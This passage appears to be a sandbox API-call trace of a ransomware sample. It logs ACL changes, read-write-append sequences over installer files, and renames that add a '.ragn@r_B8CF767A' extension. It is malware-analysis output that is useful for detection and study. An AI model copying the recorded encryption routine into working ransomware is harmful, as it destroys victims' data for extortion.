(lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 195 os_tid = 0xf48 [0171.597] GetNamedSecurityInfoW () returned 0x0 [0171.597] SetEntriesInAclW () returned 0x0 [0171.597] SetNamedSecurityInfoW () returned 0x0 [0171.598] LocalFree (hMem=0x5d4ed10) returned 0x0 [0171.598] LocalFree (hMem=0x5d4ed24) returned 0x5d4ed24 [0171.598] LocalFree (hMem=0x355e408) returned 0x0 [0171.598] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf")) returned 0x20 [0171.598] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3b8 [0171.598] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x5affee8 | out: lpFileSize=0x5affee8*=8876) returned 1 [0171.598] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x229d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.598] GetProcessHeap () returned 0x3520000 [0171.599] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584a48 [0171.599] ReadFile (in: hFile=0x3b8, lpBuffer=0x3584a48, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affea0, lpOverlapped=0x0 | out: lpBuffer=0x3584a48*, lpNumberOfBytesRead=0x5affea0*=0xf, lpOverlapped=0x0) returned 1 [0172.013] VirtualAlloc (lpAddress=0x0, dwSize=0x22ac, flAllocationType=0x3000, flProtect=0x4) returned 0x3510000 [0172.014] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.014] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affebc | out: lpNewFilePointer=0x0) returned 1 [0172.014] ReadFile (in: hFile=0x3b8, lpBuffer=0x3510000, nNumberOfBytesToRead=0x22ac, lpNumberOfBytesRead=0x5affe90, lpOverlapped=0x0 | out: lpBuffer=0x3510000*, lpNumberOfBytesRead=0x5affe90*=0x22ac, lpOverlapped=0x0) returned 1 [0172.202] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affe94 | out: lpNewFilePointer=0x0) returned 1 [0172.202] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x22ac, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.202] WriteFile (in: hFile=0x3b8, lpBuffer=0x3510000*, nNumberOfBytesToWrite=0x22ac, lpNumberOfBytesWritten=0x5affe8c, lpOverlapped=0x0 | out: lpBuffer=0x3510000*, lpNumberOfBytesWritten=0x5affe8c*=0x22ac, lpOverlapped=0x0) returned 1 [0172.203] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x22ac, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.203] VirtualFree (lpAddress=0x3510000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.206] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x22ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.206] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.206] WriteFile (in: hFile=0x3b8, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affecc, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5affecc*=0x100, lpOverlapped=0x0) returned 1 [0172.206] WriteFile (in: hFile=0x3b8, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affecc, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5affecc*=0x100, lpOverlapped=0x0) returned 1 [0172.206] WriteFile (in: hFile=0x3b8, lpBuffer=0x5affed0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affecc, lpOverlapped=0x0 | out: lpBuffer=0x5affed0*, lpNumberOfBytesWritten=0x5affecc*=0xf, lpOverlapped=0x0) returned 1 [0172.206] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.206] GetProcessHeap () returned 0x3520000 [0172.206] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584a48 | out: hHeap=0x3520000) returned 1 [0172.206] CloseHandle (hObject=0x3b8) returned 1 [0172.208] lstrcpyW (in: lpString1=0x5affa3c, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" [0172.208] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf.ragn@r_B8CF767A" [0172.208] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 196 os_tid = 0x136c [0171.600] GetNamedSecurityInfoW () returned 0x0 [0171.601] SetEntriesInAclW () returned 0x0 [0171.601] SetNamedSecurityInfoW () returned 0x0 [0171.602] LocalFree (hMem=0x5d4f3e0) returned 0x0 [0171.602] LocalFree (hMem=0x5d4f3f4) returned 0x5d4f3f4 [0171.602] LocalFree (hMem=0x355e408) returned 0x0 [0171.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml")) returned 0x20 [0171.602] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0171.602] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5effa9c | out: lpFileSize=0x5effa9c*=86284) returned 1 [0171.602] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x150fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.603] GetProcessHeap () returned 0x3520000 [0171.603] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584d18 [0171.603] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584d18, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5effa54, lpOverlapped=0x0 | out: lpBuffer=0x3584d18*, lpNumberOfBytesRead=0x5effa54*=0xf, lpOverlapped=0x0) returned 1 [0171.605] VirtualAlloc (lpAddress=0x0, dwSize=0x1510c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0171.605] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.605] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effa70 | out: lpNewFilePointer=0x0) returned 1 [0171.605] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x1510c, lpNumberOfBytesRead=0x5effa44, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5effa44*=0x1510c, lpOverlapped=0x0) returned 1 [0172.017] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effa48 | out: lpNewFilePointer=0x0) returned 1 [0172.018] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1510c, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.018] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x1510c, lpNumberOfBytesWritten=0x5effa40, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5effa40*=0x1510c, lpOverlapped=0x0) returned 1 [0172.019] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1510c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.019] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.021] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x1510c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.021] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.021] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effa80, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5effa80*=0x100, lpOverlapped=0x0) returned 1 [0172.021] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effa80, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5effa80*=0x100, lpOverlapped=0x0) returned 1 [0172.021] WriteFile (in: hFile=0x3bc, lpBuffer=0x5effa84*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5effa80, lpOverlapped=0x0 | out: lpBuffer=0x5effa84*, lpNumberOfBytesWritten=0x5effa80*=0xf, lpOverlapped=0x0) returned 1 [0172.022] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.022] GetProcessHeap () returned 0x3520000 [0172.022] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584d18 | out: hHeap=0x3520000) returned 1 [0172.022] CloseHandle (hObject=0x3bc) returned 1 [0172.025] lstrcpyW (in: lpString1=0x5eff5f0, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" [0172.026] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.ragn@r_B8CF767A" [0172.026] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 197 os_tid = 0xf24 [0172.371] GetNamedSecurityInfoW () returned 0x0 [0172.372] SetEntriesInAclW () returned 0x0 [0172.372] SetNamedSecurityInfoW () returned 0x0 [0172.373] LocalFree (hMem=0x35cd8e0) returned 0x0 [0172.373] LocalFree (hMem=0x35cd8f4) returned 0x35cd8f4 [0172.374] LocalFree (hMem=0x35cdce8) returned 0x0 [0172.374] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf")) returned 0x20 [0172.374] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3b8 [0172.374] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x5aff8b4 | out: lpFileSize=0x5aff8b4*=3188) returned 1 [0172.374] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0xc65, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.374] GetProcessHeap () returned 0x3520000 [0172.374] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584a48 [0172.374] ReadFile (in: hFile=0x3b8, lpBuffer=0x3584a48, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5aff86c, lpOverlapped=0x0 | out: lpBuffer=0x3584a48*, lpNumberOfBytesRead=0x5aff86c*=0xf, lpOverlapped=0x0) returned 1 [0172.397] VirtualAlloc (lpAddress=0x0, dwSize=0xc74, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0172.398] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.398] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5aff888 | out: lpNewFilePointer=0x0) returned 1 [0172.398] ReadFile (in: hFile=0x3b8, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xc74, lpNumberOfBytesRead=0x5aff85c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5aff85c*=0xc74, lpOverlapped=0x0) returned 1 [0172.399] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5aff860 | out: lpNewFilePointer=0x0) returned 1 [0172.399] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xc74, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.399] WriteFile (in: hFile=0x3b8, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xc74, lpNumberOfBytesWritten=0x5aff858, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5aff858*=0xc74, lpOverlapped=0x0) returned 1 [0172.399] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xc74, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.399] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.400] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0xc74, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.400] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.400] WriteFile (in: hFile=0x3b8, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5aff898, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5aff898*=0x100, lpOverlapped=0x0) returned 1 [0172.400] WriteFile (in: hFile=0x3b8, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5aff898, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5aff898*=0x100, lpOverlapped=0x0) returned 1 [0172.400] WriteFile (in: hFile=0x3b8, lpBuffer=0x5aff89c*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5aff898, lpOverlapped=0x0 | out: lpBuffer=0x5aff89c*, lpNumberOfBytesWritten=0x5aff898*=0xf, lpOverlapped=0x0) returned 1 [0172.400] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.400] GetProcessHeap () returned 0x3520000 [0172.401] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584a48 | out: hHeap=0x3520000) returned 1 [0172.401] CloseHandle (hObject=0x3b8) returned 1 [0172.402] lstrcpyW (in: lpString1=0x5aff408, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" [0172.402] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf.ragn@r_B8CF767A" [0172.402] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 198 os_tid = 0x4fc [0172.378] GetNamedSecurityInfoW () returned 0x0 [0172.378] SetEntriesInAclW () returned 0x0 [0172.378] SetNamedSecurityInfoW () returned 0x0 [0172.379] LocalFree (hMem=0x35cd8e0) returned 0x0 [0172.379] LocalFree (hMem=0x35cd8f4) returned 0x35cd8f4 [0172.379] LocalFree (hMem=0x35cdce8) returned 0x0 [0172.379] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml")) returned 0x20 [0172.379] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0172.379] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5effc6c | out: lpFileSize=0x5effc6c*=77232) returned 1 [0172.379] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x12da1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.380] GetProcessHeap () returned 0x3520000 [0172.380] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584d18 [0172.380] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584d18, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5effc24, lpOverlapped=0x0 | out: lpBuffer=0x3584d18*, lpNumberOfBytesRead=0x5effc24*=0xf, lpOverlapped=0x0) returned 1 [0172.411] VirtualAlloc (lpAddress=0x0, dwSize=0x12db0, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0172.412] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.412] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effc40 | out: lpNewFilePointer=0x0) returned 1 [0172.412] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x12db0, lpNumberOfBytesRead=0x5effc14, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5effc14*=0x12db0, lpOverlapped=0x0) returned 1 [0172.421] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effc18 | out: lpNewFilePointer=0x0) returned 1 [0172.422] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x12db0, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.422] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x12db0, lpNumberOfBytesWritten=0x5effc10, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5effc10*=0x12db0, lpOverlapped=0x0) returned 1 [0172.422] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x12db0, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.422] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.423] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x12db0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.423] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.423] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effc50, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5effc50*=0x100, lpOverlapped=0x0) returned 1 [0172.424] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effc50, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5effc50*=0x100, lpOverlapped=0x0) returned 1 [0172.424] WriteFile (in: hFile=0x3bc, lpBuffer=0x5effc54*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5effc50, lpOverlapped=0x0 | out: lpBuffer=0x5effc54*, lpNumberOfBytesWritten=0x5effc50*=0xf, lpOverlapped=0x0) returned 1 [0172.424] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.424] GetProcessHeap () returned 0x3520000 [0172.424] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584d18 | out: hHeap=0x3520000) returned 1 [0172.424] CloseHandle (hObject=0x3bc) returned 1 [0172.429] lstrcpyW (in: lpString1=0x5eff7c0, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" [0172.429] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.ragn@r_B8CF767A" [0172.429] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 199 os_tid = 0x378 [0172.527] GetNamedSecurityInfoW () returned 0x0 [0172.527] SetEntriesInAclW () returned 0x0 [0172.527] SetNamedSecurityInfoW () returned 0x0 [0172.528] LocalFree (hMem=0x358a128) returned 0x0 [0172.528] LocalFree (hMem=0x358a13c) returned 0x358a13c [0172.528] LocalFree (hMem=0x5d4ff20) returned 0x0 [0172.528] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf")) returned 0x20 [0172.528] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0172.529] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5affb80 | out: lpFileSize=0x5affb80*=3702) returned 1 [0172.529] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xe67, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.529] GetProcessHeap () returned 0x3520000 [0172.529] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b50 [0172.529] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584b50, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affb38, lpOverlapped=0x0 | out: lpBuffer=0x3584b50*, lpNumberOfBytesRead=0x5affb38*=0xf, lpOverlapped=0x0) returned 1 [0172.537] VirtualAlloc (lpAddress=0x0, dwSize=0xe76, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0172.539] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.539] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affb54 | out: lpNewFilePointer=0x0) returned 1 [0172.539] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xe76, lpNumberOfBytesRead=0x5affb28, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affb28*=0xe76, lpOverlapped=0x0) returned 1 [0172.539] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affb2c | out: lpNewFilePointer=0x0) returned 1 [0172.540] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xe76, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.540] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xe76, lpNumberOfBytesWritten=0x5affb24, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affb24*=0xe76, lpOverlapped=0x0) returned 1 [0172.540] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xe76, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.540] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.541] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xe76, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.541] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.541] WriteFile (in: hFile=0x3bc, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affb64, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, 